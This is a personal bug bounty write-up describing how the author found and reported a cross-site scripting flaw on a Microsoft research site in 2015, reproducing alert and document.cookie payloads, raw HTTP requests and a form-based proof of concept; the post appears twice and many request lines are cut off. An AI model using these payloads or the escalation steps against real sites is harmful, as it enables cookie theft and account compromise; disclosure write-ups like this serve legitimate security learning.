Hii
I am Raghav & this is the story of how I managed get to get my name on Microsoft Security Researcher Acknowledgements for Microsoft Online Services (November 2015).
NOTE : I am writing my first POST plus not a Literature guy so any typos & grammatical errors in my story Do Ignore.
Link : https://technet.microsoft.com/en-in/security/cc308589.aspx
I started my journey from January 2015 when I was working as Security Consultant & one day I thought "what the fuck I am doing with my life ? " & started asking myself some life changing questions. Although I got some experience & knowledge as I started having fun with hacking stuff since 2008. I was studying at High School then and like to Deface websites for fun, making viruses, using cryptography for cheating in exams & the list go on...
so, I looked up in the mirror & cursed the world & decided to switch from Security Consultant to Freelancer.
Now, If you starting as a freelancer and you do not have any connections Congratulations "You Are Screwed !!!".
Your own parents will curse you, as you sticked to them like a parasite and your friends plus others will give bull shit uncountable advice's.
So, putting all there advice's in trash, I started looking for Bug Bounty Programs & I registered myself to hackerone, bugcrowd, cobalt etc... started looking for public programs from vulnerability-lab but the biggest mistake I did was I started using Vulnerability Scanners and they were giving me millions of false positive plus hundreds of Duplicate Results/reports and wasted my exactly 2 months...:(
Now, after pin down to ground & loosing many times, I took my faith from vulnerability scanners & started believing in me and switched to manual vulnerability testing. As I was going to start testing I have to choose the target from hundreds of public available programs. At that time I was started working with python programming so I open python interpreter and make a random character generation program 4 line easy code ;
Here It goes ;
>>> import random
>>> import string
>>> a = string.letters
>>> random.choice(a)
Output : "w"
Now, I start searching the Bounty programs started with letter "w" in "http://www.vulnerability-lab.com/list-of-bug-bounty-programs.php"
& I choose the first target "Wamba" out of other 10 Programs.
After around 2-3 days of manual testing I got my first Verified XSS Bug that pay-off 150$ & a Hall of Fame.
Link : http://corp.wamba.com/en/developer/security/?fame
So, Finally I got a start...
Now one thing I know for sure that I have to give my best if I have to find bugs at Top Level Dinosaurs like Microsoft, google, facebook etc...
so I started Hunting for small fishes in pound for practice and I got many.
NOTE : Check my linkedIn profile for those fishes : https://in.linkedin.com/in/raghav-bisht-8a99b049
After exactly 8 months of practice & learning I choose Microsoft as my first target. You must be wondering why Microsoft ? Because of it Bug Bounty Scope. There scope is wide as they are doing bug bounty of online services, products like office, etc...
As my expertise is in Web Application, I choose to go with there Online Services. Now I have to choose the target as there are hundred of domains, sub-domains etc are out there. Having paranoia of being lucky I again open my random python program & this time its give the letter "R".
so I scan for sub-domains of microsoft using Acunetix Tool For Sub-domain Scanner & I got a domain "http://research.microsoft.com/
Now, testing Begin's...
On November, 3rd 2015 Morning 2:19Am I Reported my First Bug to Microsoft That was " Open Redirection "
And I Failed....:(
Now on same day November, 3rd 2015 Afternoon 1:27 PM I Reported A verified XSS Bug To Microsoft.
NOTE : Exactly The Same Report :
------------------------------
&
Put XSS Payload : javascript:alert(123456789)
3. Forward The Request...
Original Request :
--------------------------
POST /apps/mobile/feedback.aspx HTTP/1.1
Host: research.microsoft.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://research.microsoft.com/
Cookie: MC1=GUID=
A=I&I=
_vis_opt_s=2%7C; _vis_opt_exp_1025_exclude=1; MSFPC=ID=
km_ai=
WT_FPC=id=
omniID=1445758143494_c04d_
Connection: keep-alive
Content-Type: application/x-www-form-
Content-Length: 452
__VIEWSTATE=%
%3D&__VIEWSTATEGENERATOR=
%
%2Fz5WZ7D4I2h2W9EhPlJLX2gF%
%24hiddenReferer=&Content=1&
%24commentTxt=asadas&ctl00%
Edited Request :
-------------------------
POST /apps/mobile/feedback.aspx HTTP/1.1
Host: research.microsoft.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://research.microsoft.com/
Cookie: MC1=GUID=
A=I&I=
_vis_opt_s=2%7C; _vis_opt_exp_1025_exclude=1; MSFPC=ID=
km_ai=
WT_FPC=id=
omniID=1445758143494_c04d_
Connection: keep-alive
Content-Type: application/x-www-form-
Content-Length: 470
__VIEWSTATE=%
%3D&__VIEWSTATEGENERATOR=
%
gi%
(123456789)&Content=1&Design=
%24commentTxt=m&ctl00%
Response :
------------------
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/8.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Tue, 03 Nov 2015 07:23:06 GMT
Content-Length: 8961
NOTE : POC Attached...!!!
And I Failed Again....:(
Now as we all know every story have 3 Sections The Start, The Mid & The "Twist".
As My Bug was Shutdown By MSRC Team & they says its a "SELF-XSS" I have to make my Bug Impact-full for doing So,
1. I checked for X-Frame Headrer In Response and check weather the website is Faming Inside The HTML <IFRAME> Tag.
2. Always check for document.cookie XSS Payload <script>alert(document.cookie)</script> In my case the document.cookie payload doesn't works because I have not registered to website & my browser do not contain any session. SO, this was my mistake, then I register to site & apply the document.cookie Payload the "Cookie" Pop Up box appears which help me to increase the Severity Of the Bug.
SO, My only task left was to make my bug Severity As High As Possible For ding So ;
Check Out he exact Words Of My 3rd Reply To MSRC Team...
That the POST XSS page can be created and it can be Exploited...[Source : http://blog.portswigger.net/
------------------------------
1. Save the vulnerable Page in local system : http://research.microsoft.com/
2. Edit source code and add :
</p><form name="aspnetForm" method="post" action="http://research.
<input name="ctl00$bodyPlaceholder$
3. Run in page in Local system & click on submit.
4. When form is successfully submitted Click on "Hyperlinked : Click" To Execute XSS Payload.
Conclusions :
---------------------
Video POC : https://www.youtube.com/watch?v=uokq33ssLdc
So Finally On November 17th 2015 I got the confirmation of Bug Fixed...
Thank You....!!!!
- Raghav Bisht
I am Raghav & this is the story of how I managed get to get my name on Microsoft Security Researcher Acknowledgements for Microsoft Online Services (November 2015).
NOTE : I am writing my first POST plus not a Literature guy so any typos & grammatical errors in my story Do Ignore.
Link : https://technet.microsoft.com/en-in/security/cc308589.aspx
I started my journey from January 2015 when I was working as Security Consultant & one day I thought "what the fuck I am doing with my life ? " & started asking myself some life changing questions. Although I got some experience & knowledge as I started having fun with hacking stuff since 2008. I was studying at High School then and like to Deface websites for fun, making viruses, using cryptography for cheating in exams & the list go on...
so, I looked up in the mirror & cursed the world & decided to switch from Security Consultant to Freelancer.
Now, If you starting as a freelancer and you do not have any connections Congratulations "You Are Screwed !!!".
Your own parents will curse you, as you sticked to them like a parasite and your friends plus others will give bull shit uncountable advice's.
So, putting all there advice's in trash, I started looking for Bug Bounty Programs & I registered myself to hackerone, bugcrowd, cobalt etc... started looking for public programs from vulnerability-lab but the biggest mistake I did was I started using Vulnerability Scanners and they were giving me millions of false positive plus hundreds of Duplicate Results/reports and wasted my exactly 2 months...:(
Now, after pin down to ground & loosing many times, I took my faith from vulnerability scanners & started believing in me and switched to manual vulnerability testing. As I was going to start testing I have to choose the target from hundreds of public available programs. At that time I was started working with python programming so I open python interpreter and make a random character generation program 4 line easy code ;
Here It goes ;
>>> import random
>>> import string
>>> a = string.letters
>>> random.choice(a)
Output : "w"
Now, I start searching the Bounty programs started with letter "w" in "http://www.vulnerability-lab.com/list-of-bug-bounty-programs.php"
& I choose the first target "Wamba" out of other 10 Programs.
After around 2-3 days of manual testing I got my first Verified XSS Bug that pay-off 150$ & a Hall of Fame.
Link : http://corp.wamba.com/en/developer/security/?fame
Now one thing I know for sure that I have to give my best if I have to find bugs at Top Level Dinosaurs like Microsoft, google, facebook etc...
so I started Hunting for small fishes in pound for practice and I got many.
NOTE : Check my linkedIn profile for those fishes : https://in.linkedin.com/in/raghav-bisht-8a99b049
After exactly 8 months of practice & learning I choose Microsoft as my first target. You must be wondering why Microsoft ? Because of it Bug Bounty Scope. There scope is wide as they are doing bug bounty of online services, products like office, etc...
As my expertise is in Web Application, I choose to go with there Online Services. Now I have to choose the target as there are hundred of domains, sub-domains etc are out there. Having paranoia of being lucky I again open my random python program & this time its give the letter "R".
so I scan for sub-domains of microsoft using Acunetix Tool For Sub-domain Scanner & I got a domain "http://research.microsoft.com/
Now, testing Begin's...
On November, 3rd 2015 Morning 2:19Am I Reported my First Bug to Microsoft That was " Open Redirection "
Now on same day November, 3rd 2015 Afternoon 1:27 PM I Reported A verified XSS Bug To Microsoft.
NOTE : Exactly The Same Report :
Vulnerable Domain :
------------------------------
http://research.microsoft.com/
Vulnerable Link :
---------------------------
http://research.microsoft.com/
Vulnerable Parameter :
------------------------------
hiddenReferer=
XSS Payload :
---------------------
javascript:alert(123456789)
javascript:alert(document.
javascript:alert("XSS____
Steps To Reproduce :------------------------------
http://research.microsoft.com/
Vulnerable Link :
---------------------------
http://research.microsoft.com/
Vulnerable Parameter :
------------------------------
hiddenReferer=
XSS Payload :
---------------------
javascript:alert(123456789)
javascript:alert(document.
javascript:alert("XSS____
------------------------------
&
Original Request :
--------------------------
POST /apps/mobile/feedback.aspx HTTP/1.1
Host: research.microsoft.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://research.microsoft.com/
Cookie: MC1=GUID=
A=I&I=
_vis_opt_s=2%7C; _vis_opt_exp_1025_exclude=1; MSFPC=ID=
km_ai=
WT_FPC=id=
omniID=1445758143494_c04d_
Connection: keep-alive
Content-Type: application/x-www-form-
Content-Length: 452
__VIEWSTATE=%
%3D&__VIEWSTATEGENERATOR=
%
%2Fz5WZ7D4I2h2W9EhPlJLX2gF%
%24hiddenReferer=&Content=1&
%24commentTxt=asadas&ctl00%
Edited Request :
-------------------------
POST /apps/mobile/feedback.aspx HTTP/1.1
Host: research.microsoft.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://research.microsoft.com/
Cookie: MC1=GUID=
A=I&I=
_vis_opt_s=2%7C; _vis_opt_exp_1025_exclude=1; MSFPC=ID=
km_ai=
WT_FPC=id=
omniID=1445758143494_c04d_
Connection: keep-alive
Content-Type: application/x-www-form-
Content-Length: 470
__VIEWSTATE=%
%3D&__VIEWSTATEGENERATOR=
%
gi%
(123456789)&Content=1&Design=
%24commentTxt=m&ctl00%
Response :
------------------
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/8.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Tue, 03 Nov 2015 07:23:06 GMT
Content-Length: 8961
And I Failed Again....:(
As My Bug was Shutdown By MSRC Team & they says its a "SELF-XSS" I have to make my Bug Impact-full for doing So,
1. I checked for X-Frame Headrer In Response and check weather the website is Faming Inside The HTML <IFRAME> Tag.
2. Always check for document.cookie XSS Payload <script>alert(document.cookie)</script> In my case the document.cookie payload doesn't works because I have not registered to website & my browser do not contain any session. SO, this was my mistake, then I register to site & apply the document.cookie Payload the "Cookie" Pop Up box appears which help me to increase the Severity Of the Bug.
SO, My only task left was to make my bug Severity As High As Possible For ding So ;
Check Out he exact Words Of My 3rd Reply To MSRC Team...
Respected...
As per POC for my earlier mail...------------------------------
1. Save the vulnerable Page in local system : http://research.microsoft.com/
2. Edit source code and add :
</p><form name="aspnetForm" method="post" action="http://research.
<input name="ctl00$bodyPlaceholder$
3. Run in page in Local system & click on submit.
---------------------
1. Attacker can host the page and ask for feedback's.
2. Missing of "X-Frame-Options: sameorigin " Header in Response can give advantage to attacker for XFS Attack [Source : https://www.owasp.org/index.
NOTE : Video POC, Screenshots & Edited POST Request Page Is Attached...!!!
So Finally On November 17th 2015 I got the confirmation of Bug Fixed...
Thank You....!!!!
- Raghav Bisht